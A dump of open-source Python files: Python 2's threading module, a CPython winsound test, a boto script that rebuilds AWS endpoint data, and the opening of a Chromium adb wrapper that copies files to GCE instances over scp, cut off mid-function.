repo_name | path | copies | size | content | license
---|---|---|---|---|---
lightbulb-framework/lightbulb-framework | libs/threading.py | 13 | 31569 |
"""Thread module emulating a subset of Java's threading model."""
import sys as _sys
try:
import thread
except ImportError:
del _sys.modules[__name__]
raise
import warnings
from time import time as _time, sleep as _sleep
from traceback import format_exc as _format_exc
from collections import deque
# Note regarding PEP 8 compliant aliases
# This threading model was originally inspired by Java, and inherited
# the convention of camelCase function and method names from that
# language. While those names are not in any imminent danger of being
# deprecated, starting with Python 2.6, the module now provides a
# PEP 8 compliant alias for any such method name.
# Using the new PEP 8 compliant names also facilitates substitution
# with the multiprocessing module, which doesn't provide the old
# Java inspired names.
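# For example, each camelCase name below keeps working next to its PEP 8 alias:
#   currentThread() / current_thread(), activeCount() / active_count(),
#   Thread.isAlive() / Thread.is_alive(), Condition.notifyAll() / notify_all().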
# Rename some stuff so "from threading import *" is safe
__all__ = ['activeCount', 'active_count', 'Condition', 'currentThread',
'current_thread', 'enumerate', 'Event',
'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Thread',
'Timer', 'setprofile', 'settrace', 'local', 'stack_size']
_start_new_thread = thread.start_new_thread
_allocate_lock = thread.allocate_lock
_get_ident = thread.get_ident
ThreadError = thread.error
del thread
# sys.exc_clear is used to work around the fact that except blocks
# don't fully clear the exception until 3.0.
warnings.filterwarnings('ignore', category=DeprecationWarning,
module='threading', message='sys.exc_clear')
# Debug support (adapted from ihooks.py).
# All the major classes here derive from _Verbose. We force that to
# be a new-style class so that all the major classes here are new-style.
# This helps debugging (type(instance) is more revealing for instances
# of new-style classes).
_VERBOSE = False
if __debug__:
class _Verbose(object):
def __init__(self, verbose=None):
if verbose is None:
verbose = _VERBOSE
self.__verbose = verbose
def _note(self, format, *args):
if self.__verbose:
format = format % args
format = "%s: %s\n" % (
current_thread().name, format)
_sys.stderr.write(format)
else:
# Disable this when using "python -O"
class _Verbose(object):
def __init__(self, verbose=None):
pass
def _note(self, *args):
pass
# Support for profile and trace hooks
_profile_hook = None
_trace_hook = None
def setprofile(func):
global _profile_hook
_profile_hook = func
def settrace(func):
global _trace_hook
_trace_hook = func
# Synchronization classes
Lock = _allocate_lock
def RLock(*args, **kwargs):
return _RLock(*args, **kwargs)
class _RLock(_Verbose):
def __init__(self, verbose=None):
_Verbose.__init__(self, verbose)
self.__block = _allocate_lock()
self.__owner = None
self.__count = 0
def __repr__(self):
owner = self.__owner
try:
owner = _active[owner].name
except KeyError:
pass
return "<%s owner=%r count=%d>" % (
self.__class__.__name__, owner, self.__count)
def acquire(self, blocking=1):
me = _get_ident()
if self.__owner == me:
self.__count = self.__count + 1
if __debug__:
self._note("%s.acquire(%s): recursive success", self, blocking)
return 1
rc = self.__block.acquire(blocking)
if rc:
self.__owner = me
self.__count = 1
if __debug__:
self._note("%s.acquire(%s): initial success", self, blocking)
else:
if __debug__:
self._note("%s.acquire(%s): failure", self, blocking)
return rc
__enter__ = acquire
def release(self):
if self.__owner != _get_ident():
raise RuntimeError("cannot release un-acquired lock")
self.__count = count = self.__count - 1
if not count:
self.__owner = None
self.__block.release()
if __debug__:
self._note("%s.release(): final release", self)
else:
if __debug__:
self._note("%s.release(): non-final release", self)
def __exit__(self, t, v, tb):
self.release()
# Internal methods used by condition variables
def _acquire_restore(self, count_owner):
count, owner = count_owner
self.__block.acquire()
self.__count = count
self.__owner = owner
if __debug__:
self._note("%s._acquire_restore()", self)
def _release_save(self):
if __debug__:
self._note("%s._release_save()", self)
count = self.__count
self.__count = 0
owner = self.__owner
self.__owner = None
self.__block.release()
return (count, owner)
def _is_owned(self):
return self.__owner == _get_ident()
def Condition(*args, **kwargs):
return _Condition(*args, **kwargs)
class _Condition(_Verbose):
def __init__(self, lock=None, verbose=None):
_Verbose.__init__(self, verbose)
if lock is None:
lock = RLock()
self.__lock = lock
# Export the lock's acquire() and release() methods
self.acquire = lock.acquire
self.release = lock.release
# If the lock defines _release_save() and/or _acquire_restore(),
# these override the default implementations (which just call
# release() and acquire() on the lock). Ditto for _is_owned().
try:
self._release_save = lock._release_save
except AttributeError:
pass
try:
self._acquire_restore = lock._acquire_restore
except AttributeError:
pass
try:
self._is_owned = lock._is_owned
except AttributeError:
pass
self.__waiters = []
def __enter__(self):
return self.__lock.__enter__()
def __exit__(self, *args):
return self.__lock.__exit__(*args)
def __repr__(self):
return "<Condition(%s, %d)>" % (self.__lock, len(self.__waiters))
def _release_save(self):
self.__lock.release() # No state to save
def _acquire_restore(self, x):
self.__lock.acquire() # Ignore saved state
def _is_owned(self):
# Return True if lock is owned by current_thread.
# This method is called only if __lock doesn't have _is_owned().
if self.__lock.acquire(0):
self.__lock.release()
return False
else:
return True
def wait(self, timeout=None):
if not self._is_owned():
raise RuntimeError("cannot wait on un-acquired lock")
waiter = _allocate_lock()
waiter.acquire()
self.__waiters.append(waiter)
saved_state = self._release_save()
try: # restore state no matter what (e.g., KeyboardInterrupt)
if timeout is None:
waiter.acquire()
if __debug__:
self._note("%s.wait(): got it", self)
else:
# Balancing act: We can't afford a pure busy loop, so we
# have to sleep; but if we sleep the whole timeout time,
# we'll be unresponsive. The scheme here sleeps very
# little at first, longer as time goes on, but never longer
# than 20 times per second (or the timeout time remaining).
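# For instance, with the initial delay below the successive sleeps are roughly
# 1 ms, 2 ms, 4 ms, 8 ms, 16 ms, 32 ms, and then capped at 50 ms (or at the
# remaining timeout, whichever is smaller).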
endtime = _time() + timeout
delay = 0.0005 # 500 us -> initial delay of 1 ms
while True:
gotit = waiter.acquire(0)
if gotit:
break
remaining = endtime - _time()
if remaining <= 0:
break
delay = min(delay * 2, remaining, .05)
_sleep(delay)
if not gotit:
if __debug__:
self._note("%s.wait(%s): timed out", self, timeout)
try:
self.__waiters.remove(waiter)
except ValueError:
pass
else:
if __debug__:
self._note("%s.wait(%s): got it", self, timeout)
finally:
self._acquire_restore(saved_state)
def notify(self, n=1):
if not self._is_owned():
raise RuntimeError("cannot notify on un-acquired lock")
__waiters = self.__waiters
waiters = __waiters[:n]
if not waiters:
if __debug__:
self._note("%s.notify(): no waiters", self)
return
self._note("%s.notify(): notifying %d waiter%s", self, n,
n!=1 and "s" or "")
for waiter in waiters:
waiter.release()
try:
__waiters.remove(waiter)
except ValueError:
pass
def notifyAll(self):
self.notify(len(self.__waiters))
notify_all = notifyAll
def Semaphore(*args, **kwargs):
return _Semaphore(*args, **kwargs)
class _Semaphore(_Verbose):
# After Tim Peters' semaphore class, but not quite the same (no maximum)
def __init__(self, value=1, verbose=None):
if value < 0:
raise ValueError("semaphore initial value must be >= 0")
_Verbose.__init__(self, verbose)
self.__cond = Condition(Lock())
self.__value = value
def acquire(self, blocking=1):
rc = False
self.__cond.acquire()
while self.__value == 0:
if not blocking:
break
if __debug__:
self._note("%s.acquire(%s): blocked waiting, value=%s",
self, blocking, self.__value)
self.__cond.wait()
else:
self.__value = self.__value - 1
if __debug__:
self._note("%s.acquire: success, value=%s",
self, self.__value)
rc = True
self.__cond.release()
return rc
__enter__ = acquire
def release(self):
self.__cond.acquire()
self.__value = self.__value + 1
if __debug__:
self._note("%s.release: success, value=%s",
self, self.__value)
self.__cond.notify()
self.__cond.release()
def __exit__(self, t, v, tb):
self.release()
def BoundedSemaphore(*args, **kwargs):
return _BoundedSemaphore(*args, **kwargs)
class _BoundedSemaphore(_Semaphore):
"""Semaphore that checks that # releases is <= # acquires"""
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def release(self):
if self._Semaphore__value >= self._initial_value:
raise ValueError("Semaphore released too many times")
return _Semaphore.release(self)
def Event(*args, **kwargs):
return _Event(*args, **kwargs)
class _Event(_Verbose):
# After Tim Peters' event class (without is_posted())
def __init__(self, verbose=None):
_Verbose.__init__(self, verbose)
self.__cond = Condition(Lock())
self.__flag = False
def isSet(self):
return self.__flag
is_set = isSet
def set(self):
self.__cond.acquire()
try:
self.__flag = True
self.__cond.notify_all()
finally:
self.__cond.release()
def clear(self):
self.__cond.acquire()
try:
self.__flag = False
finally:
self.__cond.release()
def wait(self, timeout=None):
self.__cond.acquire()
try:
if not self.__flag:
self.__cond.wait(timeout)
return self.__flag
finally:
self.__cond.release()
# Helper to generate new thread names
_counter = 0
def _newname(template="Thread-%d"):
global _counter
_counter = _counter + 1
return template % _counter
# Active thread administration
_active_limbo_lock = _allocate_lock()
_active = {} # maps thread id to Thread object
_limbo = {}
# Main class for threads
class Thread(_Verbose):
__initialized = False
# Need to store a reference to sys.exc_info for printing
# out exceptions when a thread tries to use a global var. during interp.
# shutdown and thus raises an exception about trying to perform some
# operation on/with a NoneType
__exc_info = _sys.exc_info
# Keep sys.exc_clear too to clear the exception just before
# allowing .join() to return.
__exc_clear = _sys.exc_clear
def __init__(self, group=None, target=None, name=None,
args=(), kwargs=None, verbose=None):
assert group is None, "group argument must be None for now"
_Verbose.__init__(self, verbose)
if kwargs is None:
kwargs = {}
self.__target = target
self.__name = str(name or _newname())
self.__args = args
self.__kwargs = kwargs
self.__daemonic = self._set_daemon()
self.__ident = None
self.__started = Event()
self.__stopped = False
self.__block = Condition(Lock())
self.__initialized = True
# sys.stderr is not stored in the class like
# sys.exc_info since it can be changed between instances
self.__stderr = _sys.stderr
def _set_daemon(self):
# Overridden in _MainThread and _DummyThread
return current_thread().daemon
def __repr__(self):
assert self.__initialized, "Thread.__init__() was not called"
status = "initial"
if self.__started.is_set():
status = "started"
if self.__stopped:
status = "stopped"
if self.__daemonic:
status += " daemon"
if self.__ident is not None:
status += " %s" % self.__ident
return "<%s(%s, %s)>" % (self.__class__.__name__, self.__name, status)
def start(self):
if not self.__initialized:
raise RuntimeError("thread.__init__() not called")
if self.__started.is_set():
raise RuntimeError("threads can only be started once")
if __debug__:
self._note("%s.start(): starting thread", self)
with _active_limbo_lock:
_limbo[self] = self
try:
_start_new_thread(self.__bootstrap, ())
except Exception:
with _active_limbo_lock:
del _limbo[self]
raise
self.__started.wait()
def run(self):
try:
if self.__target:
self.__target(*self.__args, **self.__kwargs)
finally:
# Avoid a refcycle if the thread is running a function with
# an argument that has a member that points to the thread.
del self.__target, self.__args, self.__kwargs
def __bootstrap(self):
# Wrapper around the real bootstrap code that ignores
# exceptions during interpreter cleanup. Those typically
# happen when a daemon thread wakes up at an unfortunate
# moment, finds the world around it destroyed, and raises some
# random exception *** while trying to report the exception in
# __bootstrap_inner() below ***. Those random exceptions
# don't help anybody, and they confuse users, so we suppress
# them. We suppress them only when it appears that the world
# indeed has already been destroyed, so that exceptions in
# __bootstrap_inner() during normal business hours are properly
# reported. Also, we only suppress them for daemonic threads;
# if a non-daemonic thread encounters this, something else is wrong.
try:
self.__bootstrap_inner()
except:
if self.__daemonic and _sys is None:
return
raise
def _set_ident(self):
self.__ident = _get_ident()
def __bootstrap_inner(self):
try:
self._set_ident()
self.__started.set()
with _active_limbo_lock:
_active[self.__ident] = self
del _limbo[self]
if __debug__:
self._note("%s.__bootstrap(): thread started", self)
if _trace_hook:
self._note("%s.__bootstrap(): registering trace hook", self)
_sys.settrace(_trace_hook)
if _profile_hook:
self._note("%s.__bootstrap(): registering profile hook", self)
_sys.setprofile(_profile_hook)
try:
self.run()
except SystemExit:
if __debug__:
self._note("%s.__bootstrap(): raised SystemExit", self)
except:
if __debug__:
self._note("%s.__bootstrap(): unhandled exception", self)
# If sys.stderr is no more (most likely from interpreter
# shutdown) use self.__stderr. Otherwise still use sys (as in
# _sys) in case sys.stderr was redefined since the creation of
# self.
if _sys:
_sys.stderr.write("Exception in thread %s:\n%s\n" %
(self.name, _format_exc()))
else:
# Do the best job possible w/o a huge amt. of code to
# approximate a traceback (code ideas from
# Lib/traceback.py)
exc_type, exc_value, exc_tb = self.__exc_info()
try:
print>>self.__stderr, (
"Exception in thread " + self.name +
" (most likely raised during interpreter shutdown):")
print>>self.__stderr, (
"Traceback (most recent call last):")
while exc_tb:
print>>self.__stderr, (
' File "%s", line %s, in %s' %
(exc_tb.tb_frame.f_code.co_filename,
exc_tb.tb_lineno,
exc_tb.tb_frame.f_code.co_name))
exc_tb = exc_tb.tb_next
print>>self.__stderr, ("%s: %s" % (exc_type, exc_value))
# Make sure that exc_tb gets deleted since it is a memory
# hog; deleting everything else is just for thoroughness
finally:
del exc_type, exc_value, exc_tb
else:
if __debug__:
self._note("%s.__bootstrap(): normal return", self)
finally:
# Prevent a race in
# test_threading.test_no_refcycle_through_target when
# the exception keeps the target alive past when we
# assert that it's dead.
self.__exc_clear()
finally:
with _active_limbo_lock:
self.__stop()
try:
# We don't call self.__delete() because it also
# grabs _active_limbo_lock.
del _active[_get_ident()]
except:
pass
def __stop(self):
self.__block.acquire()
self.__stopped = True
self.__block.notify_all()
self.__block.release()
def __delete(self):
"Remove current thread from the dict of currently running threads."
# Notes about running with dummy_thread:
#
# Must take care to not raise an exception if dummy_thread is being
# used (and thus this module is being used as an instance of
# dummy_threading). dummy_thread.get_ident() always returns -1 since
# there is only one thread if dummy_thread is being used. Thus
# len(_active) is always <= 1 here, and any Thread instance created
# overwrites the (if any) thread currently registered in _active.
#
# An instance of _MainThread is always created by 'threading'. This
# gets overwritten the instant an instance of Thread is created; both
# threads return -1 from dummy_thread.get_ident() and thus have the
# same key in the dict. So when the _MainThread instance created by
# 'threading' tries to clean itself up when atexit calls this method
# it gets a KeyError if another Thread instance was created.
#
# This all means that KeyError from trying to delete something from
# _active if dummy_threading is being used is a red herring. But
# since it isn't if dummy_threading is *not* being used then don't
# hide the exception.
try:
with _active_limbo_lock:
del _active[_get_ident()]
# There must not be any python code between the previous line
# and after the lock is released. Otherwise a tracing function
# could try to acquire the lock again in the same thread, (in
# current_thread()), and would block.
except KeyError:
if 'dummy_threading' not in _sys.modules:
raise
def join(self, timeout=None):
if not self.__initialized:
raise RuntimeError("Thread.__init__() not called")
if not self.__started.is_set():
raise RuntimeError("cannot join thread before it is started")
if self is current_thread():
raise RuntimeError("cannot join current thread")
if __debug__:
if not self.__stopped:
self._note("%s.join(): waiting until thread stops", self)
self.__block.acquire()
try:
if timeout is None:
while not self.__stopped:
self.__block.wait()
if __debug__:
self._note("%s.join(): thread stopped", self)
else:
deadline = _time() + timeout
while not self.__stopped:
delay = deadline - _time()
if delay <= 0:
if __debug__:
self._note("%s.join(): timed out", self)
break
self.__block.wait(delay)
else:
if __debug__:
self._note("%s.join(): thread stopped", self)
finally:
self.__block.release()
@property
def name(self):
assert self.__initialized, "Thread.__init__() not called"
return self.__name
@name.setter
def name(self, name):
assert self.__initialized, "Thread.__init__() not called"
self.__name = str(name)
@property
def ident(self):
assert self.__initialized, "Thread.__init__() not called"
return self.__ident
def isAlive(self):
assert self.__initialized, "Thread.__init__() not called"
return self.__started.is_set() and not self.__stopped
is_alive = isAlive
@property
def daemon(self):
assert self.__initialized, "Thread.__init__() not called"
return self.__daemonic
@daemon.setter
def daemon(self, daemonic):
if not self.__initialized:
raise RuntimeError("Thread.__init__() not called")
if self.__started.is_set():
raise RuntimeError("cannot set daemon status of active thread");
self.__daemonic = daemonic
def isDaemon(self):
return self.daemon
def setDaemon(self, daemonic):
self.daemon = daemonic
def getName(self):
return self.name
def setName(self, name):
self.name = name
# The timer class was contributed by Itamar Shtull-Trauring
def Timer(*args, **kwargs):
return _Timer(*args, **kwargs)
class _Timer(Thread):
"""Call a function after a specified number of seconds:
t = Timer(30.0, f, args=[], kwargs={})
t.start()
t.cancel() # stop the timer's action if it's still waiting
"""
def __init__(self, interval, function, args=[], kwargs={}):
Thread.__init__(self)
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.finished = Event()
def cancel(self):
"""Stop the timer if it hasn't finished yet"""
self.finished.set()
def run(self):
self.finished.wait(self.interval)
if not self.finished.is_set():
self.function(*self.args, **self.kwargs)
self.finished.set()
# Special thread class to represent the main thread
# This is garbage collected through an exit handler
class _MainThread(Thread):
def __init__(self):
Thread.__init__(self, name="MainThread")
self._Thread__started.set()
self._set_ident()
with _active_limbo_lock:
_active[_get_ident()] = self
def _set_daemon(self):
return False
def _exitfunc(self):
self._Thread__stop()
t = _pickSomeNonDaemonThread()
if t:
if __debug__:
self._note("%s: waiting for other threads", self)
while t:
t.join()
t = _pickSomeNonDaemonThread()
if __debug__:
self._note("%s: exiting", self)
self._Thread__delete()
def _pickSomeNonDaemonThread():
for t in enumerate():
if not t.daemon and t.is_alive():
return t
return None
# Dummy thread class to represent threads not started here.
# These aren't garbage collected when they die, nor can they be waited for.
# If they invoke anything in threading.py that calls current_thread(), they
# leave an entry in the _active dict forever after.
# Their purpose is to return *something* from current_thread().
# They are marked as daemon threads so we won't wait for them
# when we exit (conforming to previous semantics).
class _DummyThread(Thread):
def __init__(self):
Thread.__init__(self, name=_newname("Dummy-%d"))
# Thread.__block consumes an OS-level locking primitive, which
# can never be used by a _DummyThread. Since a _DummyThread
# instance is immortal, that's bad, so release this resource.
del self._Thread__block
self._Thread__started.set()
self._set_ident()
with _active_limbo_lock:
_active[_get_ident()] = self
def _set_daemon(self):
return True
def join(self, timeout=None):
assert False, "cannot join a dummy thread"
# Global API functions
def currentThread():
try:
return _active[_get_ident()]
except KeyError:
##print "current_thread(): no current thread for", _get_ident()
return _DummyThread()
current_thread = currentThread
def activeCount():
with _active_limbo_lock:
return len(_active) + len(_limbo)
active_count = activeCount
def _enumerate():
# Same as enumerate(), but without the lock. Internal use only.
return _active.values() + _limbo.values()
def enumerate():
with _active_limbo_lock:
return _active.values() + _limbo.values()
from thread import stack_size
# Create the main thread object,
# and make it available for the interpreter
# (Py_Main) as threading._shutdown.
_shutdown = _MainThread()._exitfunc
# get thread-local implementation, either from the thread
# module, or from the python fallback
try:
from thread import _local as local
except ImportError:
from _threading_local import local
def _after_fork():
# This function is called by Python/ceval.c:PyEval_ReInitThreads which
# is called from PyOS_AfterFork. Here we cleanup threading module state
# that should not exist after a fork.
# Reset _active_limbo_lock, in case we forked while the lock was held
# by another (non-forked) thread. http://bugs.python.org/issue874900
global _active_limbo_lock
_active_limbo_lock = _allocate_lock()
# fork() only copied the current thread; clear references to others.
new_active = {}
current = current_thread()
with _active_limbo_lock:
for thread in _active.itervalues():
if thread is current:
# There is only one active thread. We reset the ident to
# its new value since it can have changed.
ident = _get_ident()
thread._Thread__ident = ident
new_active[ident] = thread
else:
# All the others are already stopped.
# We don't call _Thread__stop() because it tries to acquire
# thread._Thread__block which could also have been held while
# we forked.
thread._Thread__stopped = True
_limbo.clear()
_active.clear()
_active.update(new_active)
assert len(_active) == 1
# Self-test code
def _test():
class BoundedQueue(_Verbose):
def __init__(self, limit):
_Verbose.__init__(self)
self.mon = RLock()
self.rc = Condition(self.mon)
self.wc = Condition(self.mon)
self.limit = limit
self.queue = deque()
def put(self, item):
self.mon.acquire()
while len(self.queue) >= self.limit:
self._note("put(%s): queue full", item)
self.wc.wait()
self.queue.append(item)
self._note("put(%s): appended, length now %d",
item, len(self.queue))
self.rc.notify()
self.mon.release()
def get(self):
self.mon.acquire()
while not self.queue:
self._note("get(): queue empty")
self.rc.wait()
item = self.queue.popleft()
self._note("get(): got %s, %d left", item, len(self.queue))
self.wc.notify()
self.mon.release()
return item
class ProducerThread(Thread):
def __init__(self, queue, quota):
Thread.__init__(self, name="Producer")
self.queue = queue
self.quota = quota
def run(self):
from random import random
counter = 0
while counter < self.quota:
counter = counter + 1
self.queue.put("%s.%d" % (self.name, counter))
_sleep(random() * 0.00001)
class ConsumerThread(Thread):
def __init__(self, queue, count):
Thread.__init__(self, name="Consumer")
self.queue = queue
self.count = count
def run(self):
while self.count > 0:
item = self.queue.get()
print item
self.count = self.count - 1
NP = 3
QL = 4
NI = 5
Q = BoundedQueue(QL)
P = []
for i in range(NP):
t = ProducerThread(Q, NI)
t.name = ("Producer-%d" % (i+1))
P.append(t)
C = ConsumerThread(Q, NI*NP)
for t in P:
t.start()
_sleep(0.000001)
C.start()
for t in P:
t.join()
C.join()
if __name__ == '__main__':
_test()
| mit |
mancoast/CPythonPyc_test | fail/335_test_winsound.py | 4 | 9075 |
# Ridiculously simple test of the winsound module for Windows.
import unittest
from test import support
support.requires('audio')
import time
import os
import subprocess
winsound = support.import_module('winsound')
ctypes = support.import_module('ctypes')
import winreg
def has_sound(sound):
"""Find out if a particular event is configured with a default sound"""
try:
# Ask the mixer API for the number of devices it knows about.
# When there are no devices, PlaySound will fail.
if ctypes.windll.winmm.mixerGetNumDevs() == 0:
return False
key = winreg.OpenKeyEx(winreg.HKEY_CURRENT_USER,
"AppEvents\Schemes\Apps\.Default\{0}\.Default".format(sound))
return winreg.EnumValue(key, 0)[1] != ""
except WindowsError:
return False
class BeepTest(unittest.TestCase):
# As with PlaySoundTest, incorporate the _have_soundcard() check
# into our test methods. If there's no audio device present,
# winsound.Beep returns 0 and GetLastError() returns 127, which
# is: ERROR_PROC_NOT_FOUND ("The specified procedure could not
# be found"). (FWIW, virtual/Hyper-V systems fall under this
# scenario as they have no sound devices whatsoever (not even
# a legacy Beep device).)
def test_errors(self):
self.assertRaises(TypeError, winsound.Beep)
self.assertRaises(ValueError, winsound.Beep, 36, 75)
self.assertRaises(ValueError, winsound.Beep, 32768, 75)
def test_extremes(self):
self._beep(37, 75)
self._beep(32767, 75)
def test_increasingfrequency(self):
for i in range(100, 2000, 100):
self._beep(i, 75)
def _beep(self, *args):
# these tests used to use _have_soundcard(), but it's quite
# possible to have a soundcard, and yet have the beep driver
# disabled. So basically, we have no way of knowing whether
# a beep should be produced or not, so currently if these
# tests fail we're ignoring them
#
# XXX the right fix for this is to define something like
# _have_enabled_beep_driver() and use that instead of the
# try/except below
try:
winsound.Beep(*args)
except RuntimeError:
pass
class MessageBeepTest(unittest.TestCase):
def tearDown(self):
time.sleep(0.5)
def test_default(self):
self.assertRaises(TypeError, winsound.MessageBeep, "bad")
self.assertRaises(TypeError, winsound.MessageBeep, 42, 42)
winsound.MessageBeep()
def test_ok(self):
winsound.MessageBeep(winsound.MB_OK)
def test_asterisk(self):
winsound.MessageBeep(winsound.MB_ICONASTERISK)
def test_exclamation(self):
winsound.MessageBeep(winsound.MB_ICONEXCLAMATION)
def test_hand(self):
winsound.MessageBeep(winsound.MB_ICONHAND)
def test_question(self):
winsound.MessageBeep(winsound.MB_ICONQUESTION)
class PlaySoundTest(unittest.TestCase):
def test_errors(self):
self.assertRaises(TypeError, winsound.PlaySound)
self.assertRaises(TypeError, winsound.PlaySound, "bad", "bad")
self.assertRaises(
RuntimeError,
winsound.PlaySound,
"none", winsound.SND_ASYNC | winsound.SND_MEMORY
)
@unittest.skipUnless(has_sound("SystemAsterisk"),
"No default SystemAsterisk")
def test_alias_asterisk(self):
if _have_soundcard():
winsound.PlaySound('SystemAsterisk', winsound.SND_ALIAS)
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'SystemAsterisk', winsound.SND_ALIAS
)
@unittest.skipUnless(has_sound("SystemExclamation"),
"No default SystemExclamation")
def test_alias_exclamation(self):
if _have_soundcard():
winsound.PlaySound('SystemExclamation', winsound.SND_ALIAS)
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'SystemExclamation', winsound.SND_ALIAS
)
@unittest.skipUnless(has_sound("SystemExit"), "No default SystemExit")
def test_alias_exit(self):
if _have_soundcard():
winsound.PlaySound('SystemExit', winsound.SND_ALIAS)
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'SystemExit', winsound.SND_ALIAS
)
@unittest.skipUnless(has_sound("SystemHand"), "No default SystemHand")
def test_alias_hand(self):
if _have_soundcard():
winsound.PlaySound('SystemHand', winsound.SND_ALIAS)
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'SystemHand', winsound.SND_ALIAS
)
@unittest.skipUnless(has_sound("SystemQuestion"),
"No default SystemQuestion")
def test_alias_question(self):
if _have_soundcard():
winsound.PlaySound('SystemQuestion', winsound.SND_ALIAS)
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'SystemQuestion', winsound.SND_ALIAS
)
def test_alias_fallback(self):
# In the absence of the ability to tell if a sound was actually
# played, this test has two acceptable outcomes: success (no error,
# sound was theoretically played; although as issue #19987 shows
# a box without a soundcard can "succeed") or RuntimeError. Any
# other error is a failure.
try:
winsound.PlaySound('!"$%&/(#+*', winsound.SND_ALIAS)
except RuntimeError:
pass
def test_alias_nofallback(self):
if _have_soundcard():
# Note that this is not the same as asserting RuntimeError
# will get raised: you cannot convert this to
# self.assertRaises(...) form. The attempt may or may not
# raise RuntimeError, but it shouldn't raise anything other
# than RuntimeError, and that's all we're trying to test
# here. The MS docs aren't clear about whether the SDK
# PlaySound() with SND_ALIAS and SND_NODEFAULT will return
# True or False when the alias is unknown. On Tim's WinXP
# box today, it returns True (no exception is raised). What
# we'd really like to test is that no sound is played, but
# that requires first wiring an eardrum class into unittest
# <wink>.
try:
winsound.PlaySound(
'!"$%&/(#+*',
winsound.SND_ALIAS | winsound.SND_NODEFAULT
)
except RuntimeError:
pass
else:
self.assertRaises(
RuntimeError,
winsound.PlaySound,
'!"$%&/(#+*', winsound.SND_ALIAS | winsound.SND_NODEFAULT
)
def test_stopasync(self):
if _have_soundcard():
winsound.PlaySound(
'SystemQuestion',
winsound.SND_ALIAS | winsound.SND_ASYNC | winsound.SND_LOOP
)
time.sleep(0.5)
try:
winsound.PlaySound(
'SystemQuestion',
winsound.SND_ALIAS | winsound.SND_NOSTOP
)
except RuntimeError:
pass
else: # the first sound might already be finished
pass
winsound.PlaySound(None, winsound.SND_PURGE)
else:
# Issue 8367: PlaySound(None, winsound.SND_PURGE)
# does not raise on systems without a sound card.
pass
def _get_cscript_path():
"""Return the full path to cscript.exe or None."""
for dir in os.environ.get("PATH", "").split(os.pathsep):
cscript_path = os.path.join(dir, "cscript.exe")
if os.path.exists(cscript_path):
return cscript_path
__have_soundcard_cache = None
def _have_soundcard():
"""Return True iff this computer has a soundcard."""
global __have_soundcard_cache
if __have_soundcard_cache is None:
cscript_path = _get_cscript_path()
if cscript_path is None:
# Could not find cscript.exe to run our VBScript helper. Default
# to True: most computers these days *do* have a soundcard.
return True
check_script = os.path.join(os.path.dirname(__file__),
"check_soundcard.vbs")
p = subprocess.Popen([cscript_path, check_script],
stdout=subprocess.PIPE)
__have_soundcard_cache = not p.wait()
p.stdout.close()
return __have_soundcard_cache
def test_main():
support.run_unittest(BeepTest, MessageBeepTest, PlaySoundTest)
if __name__=="__main__":
test_main()
| gpl-3.0 |
ramitsurana/boto | scripts/rebuild_endpoints.py | 79 | 1281 |
import json
from pyquery import PyQuery as pq
import requests
class FetchError(Exception):
pass
def fetch_endpoints():
# We utilize what the Java SDK publishes as a baseline.
resp = requests.get('https://raw2.github.com/aws/aws-sdk-java/master/src/main/resources/etc/regions.xml')
if int(resp.status_code) != 200:
raise FetchError("Failed to fetch the endpoints. Got {0}: {1}".format(
resp.status_code,
resp.text
))
return resp.text
def parse_xml(raw_xml):
return pq(raw_xml, parser='xml')
def build_data(doc):
data = {}
# Run through all the regions. These have all the data we need.
for region_elem in doc('Regions').find('Region'):
region = pq(region_elem, parser='xml')
region_name = region.find('Name').text()
for endp in region.find('Endpoint'):
service_name = endp.find('ServiceName').text
endpoint = endp.find('Hostname').text
data.setdefault(service_name, {})
data[service_name][region_name] = endpoint
return data
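# The resulting mapping is keyed by service, then region, e.g. (illustrative values only):
#   {"ec2": {"us-east-1": "ec2.us-east-1.amazonaws.com"}}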
def main():
raw_xml = fetch_endpoints()
doc = parse_xml(raw_xml)
data = build_data(doc)
print(json.dumps(data, indent=4, sort_keys=True))
if __name__ == '__main__':
main()
| mit |
eval1749/elang | build/android/devil/android/sdk/gce_adb_wrapper.py | 12 | 4853 |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides a work around for various adb commands on android gce instances.
Some adb commands don't work well when the device is a cloud vm, namely
'push' and 'pull'. With gce instances, moving files through adb can be
painfully slow and hit timeouts, so the methods here just use scp instead.
"""
# pylint: disable=unused-argument
import logging
import os
import subprocess
from devil.android import device_errors
from devil.android.sdk import adb_wrapper
from devil.utils import cmd_helper
# SSH key file for accessing the instances. The keys are created at
# startup and removed & revoked at teardown.
_SSH_KEY_FILE = '/tmp/ssh_android_gce_instance'
class GceAdbWrapper(adb_wrapper.AdbWrapper):
def __init__(self, device_serial):
super(GceAdbWrapper, self).__init__(device_serial)
self._instance_ip = self.Shell('getprop net.gce.ip_address').strip()
#override
def Push(self, local, remote, **kwargs):
"""Pushes an object from the host to the gce instance.
Args:
local: Path on the host filesystem.
remote: Path on the instance filesystem.
"""
adb_wrapper.VerifyLocalFileExists(_SSH_KEY_FILE)
adb_wrapper.VerifyLocalFileExists(local)
if os.path.isdir(local):
self.Shell('mkdir -p %s' % cmd_helper.SingleQuote(remote))
# When the object to be pushed is a directory, adb merges the source dir
# with the destination dir. So if local is a dir, just scp its contents.
for f in os.listdir(local):
self._PushObject(os.path.join(local, f), os.path.join(remote, f))
self.Shell('chmod 777 %s' %
cmd_helper.SingleQuote(os.path.join(remote, f)))
else:
parent_dir = remote[0:remote.rfind('/')]
if parent_dir:
self.Shell('mkdir -p %s' % cmd_helper.SingleQuote(parent_dir))
self._PushObject(local, remote)
self.Shell('chmod 777 %s' % cmd_helper.SingleQuote(remote))
def _PushObject(self, local, remote):
"""Copies an object from the host to the gce instance using scp.
Args:
local: Path on the host filesystem.
remote: Path on the instance filesystem.
"""
cmd = [
'scp',
'-r',
'-i', _SSH_KEY_FILE,
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
local,
'root@%s:%s' % (self._instance_ip, remote)
]
status, _ = cmd_helper.GetCmdStatusAndOutput(cmd)
if status:
raise device_errors.AdbCommandFailedError(
